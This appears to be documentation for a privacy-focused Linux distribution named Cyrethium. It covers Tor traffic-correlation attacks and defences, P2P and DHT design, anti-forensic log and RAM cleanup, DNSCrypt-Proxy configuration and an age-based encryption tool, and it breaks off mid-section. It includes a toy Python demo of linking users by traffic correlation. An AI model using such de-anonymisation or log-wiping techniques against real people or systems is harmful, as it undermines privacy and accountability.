Correlation attacks require significant resources and are typically performed by:

  • Nation-state actors: Governments with access to internet infrastructure
  • Large ISPs: Companies that can monitor traffic at scale
  • Well-funded organizations: Groups that can operate many Tor nodes

These attacks are not practical for average attackers due to the need for widespread network monitoring.

Limitations of Correlation Attacks

While powerful, correlation attacks have limitations:

  • They require monitoring both entry and exit points
  • They work better with longer observation periods
  • They produce probabilistic results, not certainty
  • They're less effective when many users are active simultaneously
  • They can be disrupted by traffic padding and timing obfuscation
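The matching step described above, and the padding limitation in the last bullet, as an added example (not Cyrethium code): an observer bins the bytes each flow sends per second on the entry side and on the exit side, scores every entry/exit pair with Pearson correlation and takes the best match. The users, flows and burst positions are constructed; the 514-byte cell size, the 0.4 s latency and the 2% overhead are assumptions made for the illustration.

```python
"""Toy traffic-correlation demo (added example, not Cyrethium code).

An observer sees per-flow byte volumes at the entry side and at the exit
side, bins them into time windows and matches the most similar pair.
Flows here are constructed, not captured traffic.
"""
import math

BIN_SECONDS = 1.0   # assumed observation window
N_BINS = 60         # assumed one-minute observation


def bin_flow(records, n_bins=N_BINS):
    """Sum bytes per time bin. records: iterable of (t_seconds, n_bytes)."""
    bins = [0.0] * n_bins
    for t, size in records:
        idx = int(t // BIN_SECONDS)
        if 0 <= idx < n_bins:
            bins[idx] += size
    return bins


def pearson(a, b):
    """Pearson correlation; 0.0 if either series is flat (carries no information)."""
    n = len(a)
    ma, mb = sum(a) / n, sum(b) / n
    cov = sum((x - ma) * (y - mb) for x, y in zip(a, b))
    sa = math.sqrt(sum((x - ma) ** 2 for x in a))
    sb = math.sqrt(sum((y - mb) ** 2 for y in b))
    return 0.0 if sa == 0 or sb == 0 else cov / (sa * sb)


def best_match(entry_bins, exit_bins_by_name):
    """Return (name, score) of the exit-side flow that best matches the entry flow."""
    scores = {name: pearson(entry_bins, b) for name, b in exit_bins_by_name.items()}
    best = max(scores, key=scores.get)
    return best, scores[best]


def pad_constant_rate(bins, rate):
    """Defence from the text: dummy traffic fills every window up to `rate` bytes."""
    return [max(b, rate) for b in bins]


def make_flow(burst_bins, packets_per_burst=8, pkt_bytes=514):
    """Constructed bursty flow: a few cell-sized packets in each burst window."""
    return [(b + 0.1 + k * 0.04, pkt_bytes)
            for b in burst_bins for k in range(packets_per_burst)]


def as_seen_at_exit(flow, latency=0.4, overhead=1.02):
    """What the exit-side observer sees: the same bursts, delayed and slightly larger."""
    return [(t + latency, size * overhead) for t, size in flow]


# Constructed users with distinct activity patterns (windows in which they burst).
USERS = {
    "alice": make_flow([5, 6, 20, 21, 22, 40]),
    "bob":   make_flow([10, 11, 30, 31, 45]),
    "carol": make_flow([3, 15, 16, 50, 51]),
}
EXIT_SIDE = {name: bin_flow(as_seen_at_exit(f)) for name, f in USERS.items()}


def demo(user="alice"):
    """Unpadded: the observer links the user. Padded: the link disappears.

    Returns (linked_name, score, score_after_padding)."""
    entry = bin_flow(USERS[user])
    linked, score = best_match(entry, EXIT_SIDE)
    padded = pad_constant_rate(entry, rate=8 * 514)
    _, padded_score = best_match(padded, EXIT_SIDE)
    return linked, score, padded_score


if __name__ == "__main__":
    print(demo())
```

Volume alone links each constructed user with a score near 1.0 because the exit side is just a delayed, scaled copy of the entry side; padding every window to a constant rate flattens the entry-side series, the correlation collapses to zero and the observer can no longer pick a user. Real attacks add timing and packet-size features and have to cope with noise from thousands of concurrent flows, which is where the probabilistic results mentioned above come from.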

How to Defend Against Correlation Attacks

1. Use Bridges

Tor bridges are entry relays that aren't listed in the public directory. They mainly defend against censorship and against observers who identify Tor users by matching destination IPs against the public relay list. Against end-to-end correlation they help less: the bridge still sees your traffic pattern, and an observer at your ISP still sees the flow to the bridge, even if it cannot immediately tell that the flow is Tor.

2. Avoid Patterns

Don't use Tor at predictable times or for predictable durations. Vary your usage patterns to make correlation more difficult.

3. Use Additional Layers

Consider using VPN + Tor or Tor + VPN combinations to add extra layers that make correlation harder (though this has trade-offs).

4. Limit Session Length

Shorter sessions provide less data for correlation. Don't stay connected for hours at a time if you can avoid it.

5. Avoid High-Bandwidth Activities

Streaming video or downloading large files creates distinctive patterns. Use Tor primarily for browsing and messaging.

Cyrethium's Approach

Cyrethium helps mitigate correlation attacks by:

  • Supporting Tor bridge configuration
  • Providing tools to manage Tor circuits
  • Implementing traffic isolation between applications
  • Offering guidance on safe usage patterns

Advanced Mitigation Techniques

Traffic Padding and Obfuscation

Some advanced techniques can make correlation harder:

  • Constant-rate traffic: Send dummy packets to maintain consistent traffic flow
  • Random delays: Add random delays between packets to disrupt timing patterns
  • Traffic morphing: Make your traffic look like normal web browsing

Note: These techniques are mostly implemented at the network level and may impact performance.

Use Pluggable Transports

Pluggable transports disguise Tor traffic as other types of traffic. They are a censorship-circumvention measure: they hide from your local network the fact that you are using Tor, but they do not remove the timing and volume pattern that a correlating observer relies on:

  • obfs4: Makes Tor traffic look random and unidentifiable
  • meek: Tunnels Tor through HTTPS connections to popular websites
  • Snowflake: Uses temporary proxies provided by volunteers

Compartmentalize Your Activities

Don't mix different activities in the same Tor session:

  • Use separate Tor sessions for different identities
  • Don't browse personal sites and anonymous sites in the same session
  • Restart Tor Browser between different activities

Real-World Correlation Attack Cases

Operation Onymous (2014)

In November 2014 law enforcement agencies seized a number of onion services, including the Silk Road 2.0 marketplace. How the servers were located has never been officially disclosed; traffic correlation over an extended period is one of the hypotheses discussed by researchers, alongside more mundane server misconfigurations.

Academic Research Demonstrations

Researchers have successfully demonstrated correlation attacks in controlled environments:

  • Reporting accuracies above 90% in experiments where the researchers controlled a fraction of the relays (results depend heavily on the experimental setup)
  • De-anonymizing users through website fingerprinting with machine learning
  • Tracking users across sessions using timing analysis

The Silk Road Case

Ross Ulbricht was identified mainly through operational security failures rather than traffic correlation: an early promotional post for the site under the handle "altoid" on a clearnet forum was later linked to a post by the same handle that gave his personal e-mail address, and the FBI stated that it located the server through a misconfiguration of the site's own login page. The case shows that persistent investigation of the mistakes made around Tor, not a weakness of the network itself, is what usually identifies a user.

Understanding Your Threat Model

Low-Resource Attackers

Individual hackers or small groups typically cannot perform correlation attacks. They lack the infrastructure to monitor multiple network points simultaneously.

Medium-Resource Attackers

Large corporations or well-funded criminal organizations might attempt correlation attacks but face significant technical and legal barriers.

High-Resource Attackers

Nation-states and intelligence agencies have the capability to perform sophisticated correlation attacks:

  • Access to internet backbone infrastructure
  • Ability to operate multiple Tor nodes
  • Advanced traffic analysis tools and expertise
  • Legal authority to compel ISPs to provide data

Practical Defense Strategy

Layer Your Defenses

  1. Use Tor correctly: Follow best practices and avoid common mistakes
  2. Add bridges: Hide the fact that you're using Tor
  3. Limit session duration: Don't stay connected for hours
  4. Vary your patterns: Don't use Tor at the same time every day
  5. Use additional tools: Consider VPN + Tor for extra protection

Operational Security (OPSEC)

Technical defenses alone aren't enough. Good OPSEC is crucial:

  • Never reveal personal information
  • Don't reuse usernames or passwords
  • Be consistent with your anonymous identity
  • Avoid time zone leaks in communications
  • Don't mix anonymous and personal activities

The Reality Check

Correlation attacks are a serious threat, but they require substantial resources and expertise. For most users, the risk comes from more mundane mistakes like:

  • Logging into personal accounts over Tor
  • Using the same username across clearnet and Tor
  • Revealing identifying information in communications
  • Not using HTTPS
  • Poor operational security practices

Focus on basic operational security first, then worry about advanced attacks.

Key Takeaway: Correlation attacks are theoretically possible but practically difficult. If you're facing a nation-state adversary, Tor alone may not be sufficient. However, for most users protecting against surveillance, tracking, and censorship, Tor combined with good OPSEC provides strong protection.

P2P Networks

Peer-to-Peer (P2P) networks are decentralized systems where participants (peers) communicate directly with each other without relying on central servers. Unlike traditional client-server models, P2P networks distribute both data and processing across all participants.

How P2P Networks Work

In a P2P network, every participant acts as both a client and a server. When you want to access a resource:

  1. Your computer connects to the P2P network
  2. You search for the resource you need
  3. The network helps you find peers who have that resource
  4. You download directly from those peers
  5. While downloading, you also share what you have with others

Types of P2P Networks

Unstructured P2P

Peers connect randomly without any organized structure. Examples include early file-sharing networks like Gnutella. These are simple but inefficient for finding specific content.

Structured P2P (DHT)

Uses Distributed Hash Tables (DHT) to organize data efficiently. Each peer is responsible for a specific range of data. BitTorrent and IPFS use this approach. It's more efficient but more complex to implement.
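A minimal Kademlia-style lookup, written as an added illustration of how a structured network assigns keys to peers (it is not BitTorrent, IPFS or Cyrethium code). Node IDs are SHA-1 hashes of constructed peer names, a key is owned by the K peers whose IDs are closest to it under the XOR metric, and each peer keeps only a small routing table of k-buckets, yet a lookup still converges on the owners in a handful of hops. K, the bucket capacity and the peer names are assumptions.

```python
"""Kademlia-style DHT lookup (added example, not Cyrethium, BitTorrent or IPFS code).

Each peer owns the keys whose IDs are closest to its own under XOR distance.
A lookup repeatedly asks the closest known peers for closer peers until the
K closest ones have all been queried. Peer names are constructed.
"""
import hashlib

K = 3            # replication width / result size (assumed)
BUCKET_CAP = 4   # contacts kept per k-bucket (assumed)


def sha1_id(text):
    return int.from_bytes(hashlib.sha1(text.encode()).digest(), "big")


def xor_distance(a, b):
    return a ^ b


def closest(key, ids, k=K):
    """The k IDs closest to key under the XOR metric."""
    return sorted(ids, key=lambda i: xor_distance(key, i))[:k]


class Peer:
    def __init__(self, name, all_ids):
        self.id = sha1_id(name)
        # k-buckets: bucket i holds contacts whose highest differing bit is i.
        # Capped at BUCKET_CAP, so no peer needs to know the whole network.
        self.buckets = {}
        for other in all_ids:
            if other == self.id:
                continue
            i = xor_distance(self.id, other).bit_length() - 1
            bucket = self.buckets.setdefault(i, [])
            if len(bucket) < BUCKET_CAP:
                bucket.append(other)

    def find_node(self, key, k=K):
        """FIND_NODE RPC: the k contacts this peer knows that are closest to key."""
        known = [c for bucket in self.buckets.values() for c in bucket]
        return closest(key, known, k)


def build_network(names):
    ids = [sha1_id(n) for n in names]
    return {sha1_id(n): Peer(n, ids) for n in names}


def iterative_lookup(peers, start_id, key, k=K):
    """Iterative lookup: query the closest unqueried peers from the shortlist
    until the k closest known peers have all been asked.
    Returns (k closest peer IDs found, number of peers queried)."""
    shortlist = {start_id, *peers[start_id].find_node(key, k)}
    queried = {start_id}
    while True:
        todo = [p for p in closest(key, shortlist, k) if p not in queried]
        if not todo:
            return closest(key, shortlist, k), len(queried)
        for pid in todo:
            queried.add(pid)
            shortlist.update(peers[pid].find_node(key, k))


if __name__ == "__main__":
    net = build_network([f"peer-{i}" for i in range(64)])
    key = sha1_id("cyrethium-x.iso")          # constructed content key
    found, asked = iterative_lookup(net, sha1_id("peer-0"), key)
    print(f"asked {asked} of {len(net)} peers; owners: {[hex(i)[:10] for i in found]}")
```

Every hop lands on a peer that shares one more leading bit with the key, so the number of peers asked grows with the logarithm of the network size rather than with the network itself. The same property is what makes the network attackable: an adversary who can place many IDs near a chosen key (a Sybil attack) ends up owning that key's neighbourhood, which is why real implementations tie node IDs to IP addresses or make them expensive to generate.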

Hybrid P2P

Combines P2P with some central coordination. For example, BitTorrent uses trackers (central servers) to help peers find each other, but the actual file transfer is P2P.

Advantages of P2P Networks

1. Decentralization

No single point of failure. If some peers go offline, the network continues functioning. This makes P2P networks resilient to censorship and attacks.

2. Scalability

As more peers join, the network becomes stronger and faster. Each new peer adds resources rather than consuming them from a central server.

3. Cost Efficiency

No need for expensive server infrastructure. The network's capacity grows organically with its user base.

4. Censorship Resistance

Difficult to shut down since there's no central authority. Content is distributed across many peers in different locations.

Challenges of P2P Networks

1. Bootstrap Problem

How does a new peer find the network? P2P networks need some initial connection points (bootstrap nodes) to get started. If these are blocked or unavailable, joining becomes difficult.

2. NAT Traversal

Most home internet connections use NAT (Network Address Translation), which makes direct peer-to-peer connections difficult. P2P networks need techniques like hole punching or relay nodes to work around this.

3. Security Concerns

  • Sybil Attacks: An attacker creates many fake identities to gain control of the network
  • Eclipse Attacks: Isolating a peer by surrounding it with malicious nodes
  • Data Poisoning: Distributing corrupted or malicious data
  • Privacy Leaks: Your IP address is visible to peers you connect with

4. Performance Issues

Finding content can be slow, especially in unstructured networks. Not all peers have good bandwidth or stay online consistently.

P2P and Privacy

P2P networks have complex privacy implications:

Privacy Advantages:

  • No central server logging your activities
  • Difficult to monitor the entire network
  • Content is distributed, not centrally stored

Privacy Risks:

  • Your IP address is visible to peers
  • Monitoring nodes can track who requests what
  • Traffic analysis can reveal patterns
  • Some P2P protocols leak metadata

P2P in Anonymity Networks

Some anonymity networks use P2P principles:

I2P (Invisible Internet Project)

A fully P2P anonymity network where all participants route traffic for each other. Unlike Tor's directory-based approach, I2P uses a distributed network database.

Freenet

A P2P platform designed for censorship-resistant publishing. Content is distributed across the network and can't be removed by any single party.

Advantages for Anonymity:

  • No central directories to compromise
  • Harder to map the entire network
  • More resilient to attacks

Challenges for Anonymity:

  • More complex to secure properly
  • Slower performance
  • Harder to analyze security properties

Using P2P Safely

1. Use a VPN or Proxy

Hide your real IP address from other peers. This is especially important for file-sharing P2P networks.

2. Verify Content

Always check hashes and signatures of downloaded content to ensure it hasn't been tampered with.

3. Limit Exposure

Don't share sensitive personal files on P2P networks. Assume anything you share will become public.

4. Use Encryption

Choose P2P applications that encrypt traffic between peers to prevent eavesdropping.

5. Be Aware of Legal Issues

Some P2P activities may be illegal in your jurisdiction. Understand the laws before participating.

P2P in Cyrethium

Cyrethium includes support for privacy-focused P2P networks:

  • I2P: Pre-configured for anonymous P2P communication
  • Tor: Can be used with some P2P applications (though not recommended for high-bandwidth activities)

The Future of P2P

P2P technology continues to evolve:

  • Blockchain: Cryptocurrencies use P2P networks for decentralized consensus
  • IPFS: A P2P file system aiming to replace HTTP
  • Decentralized social media: Platforms like Mastodon are federated (server-to-server) rather than true peer-to-peer, but apply the same decentralization idea
  • Mesh networks: P2P networks that can work without internet infrastructure

Modern P2P Applications

Cryptocurrency and Blockchain

Bitcoin and other cryptocurrencies use P2P networks for:

  • Transaction broadcasting: Sharing new transactions across the network
  • Block propagation: Distributing new blocks to all nodes
  • Consensus: Agreeing on the state of the blockchain without central authority

This creates a trustless system where no single entity controls the currency.

Decentralized File Storage

IPFS (InterPlanetary File System):

  • Content-addressed storage where files are identified by their hash
  • Automatic deduplication across the network
  • Permanent web - content can't be deleted if someone hosts it
  • Faster downloads by fetching from multiple peers

Filecoin: Adds economic incentives to IPFS, paying users to store others' data.

Decentralized Communication

Matrix Protocol:

  • Federated chat system: users pick a homeserver, and homeservers replicate room state among themselves, so no single server controls a room
  • End-to-end encryption (Olm/Megolm), enabled by default for private rooms in mainstream clients
  • Bridges to other platforms (Discord, Telegram, Slack)

Briar:

  • P2P messaging that works without internet
  • Uses Bluetooth, WiFi, and Tor for connections
  • Perfect for censored environments

P2P Security Best Practices

For File Sharing

  1. Always verify hashes: Check file integrity before opening
  2. Use a VPN: Hide your IP from other peers
  3. Scan downloads: Run antivirus on all downloaded files
  4. Limit upload bandwidth: Prevent your connection from being overwhelmed
  5. Use reputable clients: Stick to well-known, open-source P2P software

For Cryptocurrency

  1. Run your own node: Don't trust third-party nodes with your transactions
  2. Use Tor: Hide your IP when broadcasting transactions
  3. Verify connections: Ensure you're connected to legitimate peers
  4. Keep software updated: Protect against known vulnerabilities

For Anonymous Communication

  1. Verify identities: Use key fingerprints to confirm contacts
  2. Enable encryption: Always use end-to-end encryption
  3. Minimize metadata: Use protocols that hide who talks to whom
  4. Regular key rotation: Change encryption keys periodically

P2P vs Traditional Networks

When P2P is Better:

  • Need for censorship resistance
  • Distributing large files to many users
  • Building systems that must survive attacks
  • Creating trustless environments
  • Reducing infrastructure costs

When Traditional is Better:

  • Need for guaranteed performance
  • Require strong consistency guarantees
  • Need centralized control and moderation
  • Building simple applications quickly
  • Serving latency-sensitive content

The Future of P2P

Web3 and Decentralized Web

The next generation of the internet is being built on P2P principles:

  • Decentralized identity: Control your own identity without relying on companies
  • Decentralized storage: Store data across the network, not on company servers
  • Decentralized computing: Run applications on distributed networks
  • Decentralized finance (DeFi): Financial services without banks

Mesh Networks

P2P networks that work without internet infrastructure:

  • Devices connect directly to nearby devices
  • Create local networks in areas without internet
  • Provide communication during disasters or censorship
  • Examples: NYC Mesh, Freifunk, Guifi.net

Edge Computing

Combining P2P with edge computing for:

  • Faster content delivery by caching at the edge
  • Reduced latency for real-time applications
  • More efficient use of network resources

Common P2P Misconceptions

Myth: P2P is only for piracy

Reality: P2P is a neutral technology used for many legitimate purposes including software distribution (Linux ISOs), scientific data sharing, and decentralized applications.

Myth: P2P is always anonymous

Reality: Most P2P networks expose your IP address. You need additional tools (VPN, Tor) for anonymity.

Myth: P2P is slow

Reality: P2P can be faster than traditional downloads because you download from multiple sources simultaneously.

Myth: P2P networks can't be controlled

Reality: While harder to shut down, P2P networks can still be attacked through Sybil attacks, legal pressure, or infrastructure blocking.

Conclusion

P2P networks offer powerful decentralization and resilience, but they come with complexity and security challenges. When designed well, they can provide censorship resistance and scalability. However, they require careful implementation to protect user privacy and security. Understanding how P2P networks work helps you use them safely and effectively.

Key Takeaway: P2P is not just a technology for file sharing - it's a fundamental architecture for building decentralized, resilient systems. As the internet evolves, P2P principles are becoming increasingly important for privacy, freedom, and innovation.

Anti-Forensic Utilities

Cyrethium includes a suite of anti-forensic utilities designed to reduce data persistence and improve user privacy. These tools target temporary data, swap contents, RAM traces, logs, and temporary files that may remain after system shutdown/logout. These features are optional and controlled centrally through a management tool.

Note: Anti-forensic measures can make data recovery difficult or impossible. Developers accept no responsibility for the use of this tool.

What Do Anti-Forensic Settings Do?

RAM Cleaning/Encryption (on-shutdown RAM scrub)

Cleaning routines run during shutdown to reduce what remains of temporary data (memory contents in kernel and user space) once the system powers off.

Swap/Hibernation Cleanup

Active swap areas and hibernation (suspend-to-disk) files (if any) are securely handled at shutdown or reboot.

Temporary Directories and tmp Cleanup

/tmp, user temp directories, application temporary folders, and caches are targeted.

Log Rotation and Cleanup

Unnecessary details and old entries in system, application, and user logs are processed according to secure policies.

Journalctl & systemd Log Management

Works with the systemd journal configuration: traditional logs are reduced to the minimum required information level, and cleanup of client-side journal buffers is defined.

Warnings

Data Loss Risk

Aggressive cleaning can cause permanent data loss. Always backup important data.

Performance Impact

Deep cleaning processes can extend shutdown time and may briefly affect system stability in some cases.

Compatibility

Hibernation/swap policies may cause unexpected behavior on some systems — test device/driver compatibility.

DNSCrypt-Proxy

DNSCrypt-Proxy is a local DNS resolver that encrypts DNS queries and forwards them to remote resolvers over DNSCrypt, DNS-over-HTTPS (DoH), Anonymized DNSCrypt or Oblivious DoH; it also adds caching and filtering. It does not speak DNS-over-TLS (DoT). Purpose: prevent DNS queries from being observed, modified, or manipulated in transit.

Core Components

Local Proxy (dnscrypt-proxy) Service

Listens on 127.0.0.1:53 or another port and receives DNS requests from applications.

Resolver Providers

Remote resolvers supporting DNSCrypt or DoH (DNS-over-HTTPS). Anonymized DNSCrypt and Oblivious DoH relays can additionally hide your IP address from the resolver.

Cache and Filtering Layer

Caches responses; can also apply hosts-based blocking or RPZ-style filtering.

How It Works — Step by Step

  1. Application makes a DNS query (e.g., example.com).
  2. Query goes to local dnscrypt-proxy (routed via system DNS settings / resolv.conf or systemd-resolved compatible).
  3. dnscrypt-proxy sends the query to the selected remote resolver over an encrypted channel (DNSCrypt or DoH).
  4. Remote resolver's response comes back; proxy caches the response and returns it to the client.

Security/Critical Points

Query Privacy

DNS queries are encrypted, making it harder for ISPs and intermediaries to monitor queries. However, the target IP address and traffic are still visible — DNS privacy alone does not provide complete anonymity.

Metadata Leakage

Remote resolver selection matters: a single resolver sees all your queries together with your IP address. Preferred methods: use trusted resolvers, spread queries over several of them, or use Anonymized DNSCrypt/Oblivious DoH relays so that the relay sees your address but not the query and the resolver sees the query but not your address.

Application Notes for Cyrethium

Filtering

Use ad/telemetry/tracker block lists — but remember these lists can produce false positives.

Cyrethium DNSCrypt Manager

Overview

DNSCrypt Manager is a tool that protects your privacy by encrypting your DNS queries. It provides secure and anonymous DNS resolution using DNSCrypt-proxy.

Usage

cryethium-dnscrypt

Main Menu

1. Start DNSCrypt (Onetime)

Starts DNSCrypt once for testing or temporary use.

Use Cases: Testing purposes, temporary use, configuration check

Note: Stops when system is restarted.

2. Set DNSCrypt Service (Autostart)

Installs DNSCrypt service and enables automatic startup.

Features: Starts automatically at system boot, persistent configuration, systemd integration

3. Restart DNSCrypt Service

Restarts the DNSCrypt service.

When to Use: After configuration changes, during connection issues, after server changes

4. Remove DNSCrypt Service

Stops and removes the DNSCrypt service.

Actions: Stops the service, disables automatic startup, preserves configuration (does not delete)

5. Check DNSCrypt

Checks DNSCrypt configuration.

Checks: Configuration file validity, current DNS servers, test query (example.com)

6. Check DNSCrypt Service Status

Shows DNSCrypt service status.

Information Displayed: Service status (active/inactive), uptime, recent logs, error messages

7. Exit

Exits the program.

Configuration

Configuration File Location: /etc/dnscrypt-proxy/dnscrypt-proxy.toml

Popular Servers:

  • cloudflare: Cloudflare DNS (1.1.1.1)
  • google: Google DNS (8.8.8.8)
  • quad9: Quad9 DNS (9.9.9.9)
  • adguard: AdGuard DNS (ad blocking)

DNS Leak Testing

Test Methods

1. Online Test

# In browser:
https://dnsleaktest.com/
https://www.dnsleaktest.org/

2. Command Line

# Check which server answers your queries
nslookup google.com

# The "Server:" line should show the local dnscrypt-proxy listener (127.0.0.1),
# not your router or your ISP's resolver

3. Test with DNSCrypt

sudo dnscrypt-proxy -resolve example.com

Troubleshooting

DNSCrypt Won't Start

Problem: Service won't start, usually because another resolver (most often the systemd-resolved stub listener) already holds port 53

# Stop conflicting service
sudo systemctl stop systemd-resolved

# Start DNSCrypt
sudo systemctl start dnscrypt-proxy

After stopping systemd-resolved, make sure /etc/resolv.conf is a regular file containing nameserver 127.0.0.1 and not a symlink to the resolved stub file, otherwise the system is left with no working resolver at all.

DNS Not Resolving

Problem: Cannot access websites

# Check DNSCrypt status
sudo systemctl status dnscrypt-proxy

# Check configuration
sudo dnscrypt-proxy -check

# Restart service
sudo systemctl restart dnscrypt-proxy

Slow DNS Resolution

Problem: DNS queries are slow

# Select faster server
sudo nano /etc/dnscrypt-proxy/dnscrypt-proxy.toml

# Change server_names:
server_names = ['cloudflare']

# Restart service
sudo systemctl restart dnscrypt-proxy

Configuration Error

Problem: "Configuration check failed"

# Check configuration
sudo dnscrypt-proxy -check

# Fix syntax error
sudo nano /etc/dnscrypt-proxy/dnscrypt-proxy.toml

# Restore default configuration
sudo cp /etc/dnscrypt-proxy/dnscrypt-proxy.toml.example /etc/dnscrypt-proxy/dnscrypt-proxy.toml

Advanced Configuration

Ad Blocking

[blocked_names]
blocked_names_file = '/etc/dnscrypt-proxy/blocked-names.txt'

blocked-names.txt:

# Ad servers
ads.google.com
doubleclick.net
adserver.com

Custom Server Addition

[static.'my-server']
stamp = 'sdns://...'
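The sdns:// string in a [static] entry is a DNS stamp: a base64url blob that encodes the protocol, the server address, the provider key or TLS hash, and three property flags (DNSSEC, no logs, no filter) that the require_dnssec, require_nolog and require_nofilter options filter on. The following is an added example of encoding and decoding such stamps so you can see what a third-party stamp claims before trusting it; it is not dnscrypt-proxy's code, and the two stamps it builds use a made-up provider key, TEST-NET addresses and a made-up hostname.

```python
"""Encode and decode DNS stamps (sdns://) as used in dnscrypt-proxy [static] entries.

Added example, not dnscrypt-proxy's code. Format (dnscrypt.info/stamps):
  DNSCrypt: 0x01 | props(8 bytes LE) | LP(addr) | LP(provider_pk) | LP(provider_name)
  DoH:      0x02 | props(8 bytes LE) | LP(addr) | VLP(hashes) | LP(hostname) | LP(path)
LP = one length byte + data; VLP = set where the length byte's high bit means "more".
"""
import base64

PROTO_DNSCRYPT, PROTO_DOH = 0x01, 0x02
PROP_DNSSEC, PROP_NOLOG, PROP_NOFILTER = 1 << 0, 1 << 1, 1 << 2


def _lp(b):
    return bytes([len(b)]) + b


def _vlp(items):
    if not items:
        return b"\x00"                      # empty set is a single zero byte
    out = b""
    for i, item in enumerate(items):
        more = 0x80 if i < len(items) - 1 else 0
        out += bytes([len(item) | more]) + item
    return out


def encode_stamp(proto, props, addr, *, provider_pk=None, provider_name=None,
                 hashes=(), hostname=None, path=None):
    body = bytes([proto]) + props.to_bytes(8, "little") + _lp(addr.encode())
    if proto == PROTO_DNSCRYPT:
        body += _lp(provider_pk) + _lp(provider_name.encode())
    elif proto == PROTO_DOH:
        body += _vlp(list(hashes)) + _lp(hostname.encode()) + _lp(path.encode())
    else:
        raise ValueError("unsupported protocol")
    return "sdns://" + base64.urlsafe_b64encode(body).rstrip(b"=").decode()


class _Reader:
    def __init__(self, data):
        self.data, self.pos = data, 0

    def byte(self):
        self.pos += 1
        return self.data[self.pos - 1]

    def take(self, n):
        chunk = self.data[self.pos:self.pos + n]
        if len(chunk) != n:
            raise ValueError("truncated stamp")
        self.pos += n
        return chunk

    def lp(self):
        return self.take(self.byte())

    def vlp(self):
        items, more = [], True
        while more:
            length = self.byte()
            more = bool(length & 0x80)
            items.append(self.take(length & 0x7F))
        return [i for i in items if i]


def decode_stamp(stamp):
    if not stamp.startswith("sdns://"):
        raise ValueError("not a DNS stamp")
    raw = stamp[len("sdns://"):]
    data = base64.urlsafe_b64decode(raw + "=" * (-len(raw) % 4))
    r = _Reader(data)
    proto = r.byte()
    props = int.from_bytes(r.take(8), "little")
    info = {"proto": proto, "dnssec": bool(props & PROP_DNSSEC),
            "nolog": bool(props & PROP_NOLOG), "nofilter": bool(props & PROP_NOFILTER),
            "addr": r.lp().decode()}
    if proto == PROTO_DNSCRYPT:
        info["provider_pk"] = r.lp().hex()
        info["provider_name"] = r.lp().decode()
    elif proto == PROTO_DOH:
        info["hashes"] = [h.hex() for h in r.vlp()]
        info["hostname"] = r.lp().decode()
        info["path"] = r.lp().decode()
    else:
        raise ValueError(f"unsupported protocol 0x{proto:02x}")
    if r.pos != len(data):
        raise ValueError("trailing bytes in stamp")
    return info


def acceptable(info, require_dnssec=True, require_nolog=True, require_nofilter=False):
    """Mirror the require_dnssec / require_nolog / require_nofilter filters."""
    return ((info["dnssec"] or not require_dnssec)
            and (info["nolog"] or not require_nolog)
            and (info["nofilter"] or not require_nofilter))
```

The property flags are self-declared by whoever published the stamp; dnscrypt-proxy can only filter on what the stamp claims, so a stamp from an untrusted source should be checked against the provider's own published key and address before it goes into the configuration.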

Bootstrap Resolvers

dnscrypt-proxy needs ordinary, unencrypted DNS only to resolve the hostnames of its own upstream servers at start-up and to fetch the server lists. Current releases call this setting bootstrap_resolvers (older ones used fallback_resolvers / fallback_resolver); client queries are never sent through these resolvers, so a broken upstream configuration fails closed rather than leaking queries in plaintext.

bootstrap_resolvers = ['9.9.9.9:53']

Query Logging

Query logging writes every name you resolve to disk. On a privacy-focused system leave it disabled and enable it only temporarily while debugging:

[query_log]
file = '/var/log/dnscrypt-proxy/query.log'
format = 'tsv'

Performance Optimization

Cache Settings

cache = true
cache_size = 1024
cache_min_ttl = 3600
cache_max_ttl = 86400
cache_neg_min_ttl = 60
cache_neg_max_ttl = 600

Server Selection

# Leave the list empty to use every server from the sources that passes the
# require_* filters; dnscrypt-proxy then load-balances across the fastest ones
server_names = []

# Query timeout (ms); this is not a latency limit
timeout = 2500

# Maximum number of simultaneous client connections (not a server count)
max_clients = 250

Frequently Asked Questions

Q: Can DNSCrypt be used with VPN?
A: Yes. The encrypted DNS traffic then travels inside the VPN tunnel to the resolver you chose instead of going to the VPN provider's resolver; which is better depends on whom you trust less with your query history.

Q: Are all DNS queries encrypted?
A: No. Only queries that reach the system resolver are encrypted. Applications with their own resolver (browsers using built-in DoH, programs with hard-coded DNS servers, SOCKS clients that resolve through Tor) bypass dnscrypt-proxy, and the proxy's own bootstrap lookups are plaintext. Use the leak tests above to see what actually leaves the machine.

Q: Is there a performance impact?
A: Minimal impact, but speed increases with caching.

Q: Which server should I choose?
A: Cloudflare and Google are fast and reliable, but for a privacy-focused setup also check the resolver's logging policy. The public server list records it, and setting require_nolog = true in the configuration makes dnscrypt-proxy select only servers that advertise no logging.

Q: What is DNSSEC?
A: Security protocol that verifies DNS response authenticity.

Q: What are no-log servers?
A: Servers that don't keep logs of your DNS queries.

Q: Can it be used with Tor?
A: Yes, but it does not affect Tor traffic. Tor Browser and other SOCKS-aware applications resolve names through the Tor circuit, at the exit relay, so they never touch dnscrypt-proxy; DNSCrypt covers only applications that use the system resolver.

Security Notes

Important

  1. Trusted Servers: Only use trusted DNS servers; verify third-party stamps against the provider's published key and address
  2. DNSSEC: dnscrypt-proxy does not validate DNSSEC itself; set require_dnssec = true so that only resolvers that validate are selected
  3. No-Log: Prefer servers that don't keep logs (require_nolog = true)
  4. Updates: Keep DNSCrypt-proxy updated

Fangbullcrypt - Modern Encryption Tool

Overview

Fangbullcrypt is a modern file and message encryption application using the age encryption tool. It supports public key and passphrase-based encryption.

Usage

fangbullcrypt

Main Menu

1-2. Key Management

1. Generate New Key Pair

Creates a new age key pair.

Steps:

  1. Enter key pair name
  2. Private and public keys are generated
  3. Secure permissions are set (600)

Output:

Private key: ~/.fangbull/keys/mykey_private.key
Public key: ~/.fangbull/keys/mykey_public.key
Public key content: age1xxxxxxxxxxxxxx

2. List Existing Keys

Lists existing key pairs.

Shows: Key pair name, private key path, public key path, public key content

3-4. File Operations

3. Encrypt File

Encrypts a file.

With Public Key:

  1. Enter file path
  2. Output path (optional)
  3. Select "1" (Use existing public key)
  4. Select key pair
  5. File is encrypted (.age extension)

With Passphrase:

  1. Enter file path
  2. Output path (optional)
  3. Select "2" (Use passphrase)
  4. Enter passphrase (twice)
  5. File is encrypted

4. Decrypt File

Decrypts a file.

With Private Key:

  1. Encrypted file path
  2. Output path (optional)
  3. Select "1" (Use private key)
  4. Select key pair
  5. File is decrypted

With Passphrase:

  1. Encrypted file path
  2. Output path (optional)
  3. Select "2" (Use passphrase)
  4. Enter passphrase
  5. File is decrypted

5-6. Message Operations

5. Encrypt Message

Encrypts a text message.

Usage:

